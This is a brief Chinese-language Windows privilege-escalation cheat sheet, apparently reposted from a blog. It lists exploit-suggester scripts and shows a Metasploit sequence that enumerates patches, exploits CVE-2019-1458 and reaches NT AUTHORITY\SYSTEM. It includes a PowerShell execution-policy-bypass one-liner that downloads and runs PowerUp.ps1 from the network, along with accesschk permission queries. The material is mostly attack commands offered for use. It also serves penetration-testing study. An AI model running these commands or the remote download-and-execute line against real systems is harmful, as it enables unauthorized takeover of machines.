https://github.com/AonCyberLabs/Windows-Exploit-Suggester
./windows-exploit-suggester.py
https://github.com/mzet-/linux-exploit-suggester
./linux-exploit-suggester.sh
https://github.com/rasta-mouse/Sherlock
Import-Module Sherlock.ps1Find-AllVulns
# 查询补丁meterpreter> run post/windows/gather/enum_patches[+] KB2999226 installed on 11/25/2020[+] KB976902 installed on 11/21/2010# 查询Expmsf> use post/multi/recon/local_exploit_suggestermsf> set LHOST <攻击机IP>msf> set SESSION <session_id>msf> run# 利用示例msf> use exploit/windows/local/cve_2019_1458_wizardopiummsf> set SESSION <session_id>msf> runmeterpreter> getuidServer username: NT AUTHORITY\SYSTEM
powershell.exe -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Invoke-AllChecks}"powershell.exe -nop -exec bypass -c "IEX (New-object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1');Invoke-AllChecks"
accesschk "d:\dir"查看所有用户在d盘dir路径的子路径的权限accesschk "Administrator "d:\dir"查看Administrator用户在d盘dir路径的子路径的权限accesschk Administrators -c *查看Administrators组对所有服务的权限accesschk -k Guest hklm\software查看Guest用户对hklm\software注册表的权限accesschk -ou User查看User用户对全局对象的权限
转自Leticia's Blog
侵权请私聊公众号删文
热文推荐